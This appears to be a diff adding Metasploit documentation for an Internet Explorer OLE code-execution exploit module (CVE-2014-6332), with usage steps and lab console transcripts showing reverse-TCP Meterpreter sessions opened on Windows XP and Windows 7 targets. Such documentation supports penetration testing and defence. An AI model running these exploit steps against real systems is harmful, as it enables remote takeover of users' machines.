|
| 1 | +## Vulnerable Application |
| 2 | + |
| 3 | +This module exploits the Windows OLE Automation array vulnerability, [CVE-2014-6332](https://www.cvedetails.com/cve/cve-2014-6332). The vulnerability is known to affect Internet Explorer 3.0 until version 11 within Windows 95 up to Windows 10, and no patch for Windows XP. However, this exploit will only target Windows XP and Windows 7 boxes. This is because from Windows 8 upward Internet Explorer blocks the payload from executing. Windows XP by defaults supports VBS, therefore it is used as the attack vector. On other newer Windows systems, the exploit will try using Powershell instead. |
| 4 | + |
| 5 | +## Verification Steps |
| 6 | + |
| 7 | +1. Start msfconsole |
| 8 | +1. Do: ```use exploit/windows/browser/ms14_064_ole_code_execution``` |
| 9 | +1. Do: ```Choose a payload and set any specific options``` |
| 10 | +1. Do: ```run```, after a target browses to the generated URL, you should receive a session. |
| 11 | + |
| 12 | +## Options |
| 13 | + |
| 14 | +**TRYUAC** |
| 15 | + |
| 16 | +Ask victim to start as Administrator. This option only works on Windows 7 targets. |
| 17 | + |
| 18 | +**AllowPowershellPrompt** |
| 19 | + |
| 20 | +Allow exploit to try Powershell. If exploiting a Windows 7 target you need to enable this option. |
| 21 | + |
| 22 | +## Scenarios |
| 23 | + |
| 24 | +### Windows XP Pro SP3 x86 with IE 8.0.6001.18702 |
| 25 | + |
| 26 | +The attacker's IP is `192.168.2.3` and the victim's IP is `192.168.2.207`. |
| 27 | + |
| 28 | +``` |
| 29 | +msf > use exploit/windows/browser/ms14_064_ole_code_execution |
| 30 | +msf exploit(ms14_064_ole_code_execution) > set PAYLOAD windows/meterpreter/reverse_tcp |
| 31 | +PAYLOAD => windows/meterpreter/reverse_tcp |
| 32 | +msf exploit(ms14_064_ole_code_execution) > set LHOST 192.168.2.3 |
| 33 | +LHOST => 192.168.2.3 |
| 34 | +msf exploit(ms14_064_ole_code_execution) > run |
| 35 | +[*] Exploit running as background job. |
| 36 | +
|
| 37 | +[*] Started reverse TCP handler on 192.168.2.3:4444 |
| 38 | +msf exploit(ms14_064_ole_code_execution) > [*] Using URL: http://0.0.0.0:8080/hGA1Ux |
| 39 | +[*] Local IP: http://192.168.2.3:8080/hGA1Ux |
| 40 | +[*] Server started. |
| 41 | +[*] 192.168.2.207 ms14_064_ole_code_execution - Gathering target information for 192.168.2.207 |
| 42 | +[*] 192.168.2.207 ms14_064_ole_code_execution - Sending HTML response to 192.168.2.207 |
| 43 | +[*] 192.168.2.207 ms14_064_ole_code_execution - Sending exploit... |
| 44 | +[*] 192.168.2.207 ms14_064_ole_code_execution - Sending VBS stager |
| 45 | +[*] Sending stage (957487 bytes) to 192.168.2.207 |
| 46 | +[*] Meterpreter session 1 opened (192.168.2.3:4444 -> 192.168.2.207:1299) at 2017-03-01 19:07:12 +0100 |
| 47 | +
|
| 48 | +msf exploit(ms14_064_ole_code_execution) > sessions -i 1 |
| 49 | +[*] Starting interaction with 1... |
| 50 | +
|
| 51 | +meterpreter > sysinfo |
| 52 | +Computer : MACHINE |
| 53 | +OS : Windows XP (Build 2600, Service Pack 3). |
| 54 | +Architecture : x86 |
| 55 | +System Language : en_US |
| 56 | +Domain : WORKGROUP |
| 57 | +Logged On Users : 2 |
| 58 | +Meterpreter : x86/windows |
| 59 | +``` |
| 60 | + |
| 61 | +### Windows 7 Pro SP1 x64 with IE 8.0.7601.17514 |
| 62 | + |
| 63 | +The attacker's IP is `192.168.2.3` and the victim's IP is `192.168.2.208`. Unlike on the Windows XP, target victim will see a popup dialog apear and they will have to allow the execution of the PowerShell script for the exploit to work. You need to set `AllowPowershellPrompt` option to `true` otherwise the exploit won't work on Windows 7. |
| 64 | + |
| 65 | +``` |
| 66 | +msf > use exploit/windows/browser/ms14_064_ole_code_execution |
| 67 | +msf exploit(ms14_064_ole_code_execution) > set PAYLOAD windows/meterpreter/reverse_tcp |
| 68 | +PAYLOAD => windows/meterpreter/reverse_tcp |
| 69 | +msf exploit(ms14_064_ole_code_execution) > set LHOST 192.168.2.3 |
| 70 | +LHOST => 192.168.2.3 |
| 71 | +msf exploit(ms14_064_ole_code_execution) > set AllowPowershellPrompt true |
| 72 | +AllowPowershellPrompt => true |
| 73 | +msf exploit(ms14_064_ole_code_execution) > run |
| 74 | +[*] Exploit running as background job. |
| 75 | +
|
| 76 | +[*] Started reverse TCP handler on 192.168.2.3:4444 |
| 77 | +msf exploit(ms14_064_ole_code_execution) > [*] Using URL: http://0.0.0.0:8080/6tdgNjLVij3zs |
| 78 | +[*] Local IP: http://192.168.2.3:8080/6tdgNjLVij3zs |
| 79 | +[*] Server started. |
| 80 | +[*] 192.168.2.208 ms14_064_ole_code_execution - Gathering target information for 192.168.2.208 |
| 81 | +[*] 192.168.2.208 ms14_064_ole_code_execution - Sending HTML response to 192.168.2.208 |
| 82 | +[*] 192.168.2.208 ms14_064_ole_code_execution - Sending exploit... |
| 83 | +[*] Sending stage (957487 bytes) to 192.168.2.208 |
| 84 | +[*] Meterpreter session 1 opened (192.168.2.3:4444 -> 192.168.2.208:49197) at 2017-03-01 19:35:12 +0100 |
| 85 | +
|
| 86 | +msf exploit(ms14_064_ole_code_execution) > sessions -i 1 |
| 87 | +[*] Starting interaction with 1... |
| 88 | +
|
| 89 | +meterpreter > sysinfo |
| 90 | +Computer : WINDOWS7_X64 |
| 91 | +OS : Windows 7 (Build 7601, Service Pack 1). |
| 92 | +Architecture : x64 |
| 93 | +System Language : en_US |
| 94 | +Domain : WORKGROUP |
| 95 | +Logged On Users : 2 |
| 96 | +Meterpreter : x86/windows |
| 97 | +``` |
0 commit comments